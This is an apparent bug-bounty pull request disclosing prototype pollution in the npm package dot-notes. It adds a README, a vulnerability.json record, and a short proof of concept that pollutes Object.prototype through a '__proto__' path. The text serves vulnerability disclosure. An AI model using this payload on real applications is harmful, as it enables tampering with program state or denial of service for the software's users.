### PR TITLE
Prototype Pollution in dot-notes-js 

### DIFF
--- a/bounties/npm/dot-notes/1/README.md
+++ b/bounties/npm/dot-notes/1/README.md
@@ -1,0 +1,10 @@
+# Description
+```dot-notes``` is Simple dot/bracket notation parsing/conversion for JSON. 
+This package is vulnerable to prototype pollution through ```dot-notes/lib/create.js```
+
+# Proof-of-Concept
+```
+const note = require('./lib/create.js');
+note({},'__proto__.polluted',true);
+console.log(polluted)  \\true
+```

--- a/bounties/npm/dot-notes/1/vulnerability.json
+++ b/bounties/npm/dot-notes/1/vulnerability.json
@@ -1,0 +1,49 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-09-08",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+      "Discloser": "d3m0n-r00t",
+      "Fixer": ""
+    },
+    "Package": {
+      "Registry": "npm",
+      "Name": "dot-notes",
+      "URL": "https://www.npmjs.com/package/dot-notes",
+      "Downloads": "5515"
+    },
+    "CWEs": [
+      {
+        "ID": "CWE-400",
+        "Description": ""
+      }
+    ],
+    "CVSS": {
+      "Version": "3.1",
+      "AV": "",
+      "AC": "",
+      "PR": "",
+      "UI": "",
+      "S": "",
+      "C": "",
+      "I": "",
+      "A": "",
+      "E": "",
+      "RL": "",
+      "RC": "",
+      "Score": "5.6"
+    },
+    "CVEs": [""],
+    "Repository": {
+      "URL": "https://github.com/whitfin/dot-notes-js",
+      "Codebase": ["JavaScript"]
+    },
+    "Permalinks": ["https://github.com/whitfin/dot-notes-js/blob/master/lib/create.js"],
+    "References": [
+      {
+        "Description": "",
+        "URL": ""
+      }
+    ]
+  }


### PR DESCRIPTION
## ✍️ Description
```dot-notes``` is Simple dot/bracket notation parsing/conversion for JSON. 
This package is vulnerable to prototype pollution through ```dot-notes/lib/create.js```

## 🕵️‍♂️ Proof of Concept
```
const note = require('dot-notes');
note.create({},'__proto__.polluted',true);
console.log(polluted)  \\true
```
![poc](https://user-images.githubusercontent.com/29670330/92447865-71ee6b80-f1d5-11ea-89b9-e9fd1acf062d.png)

## ✅ Checklist
**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_
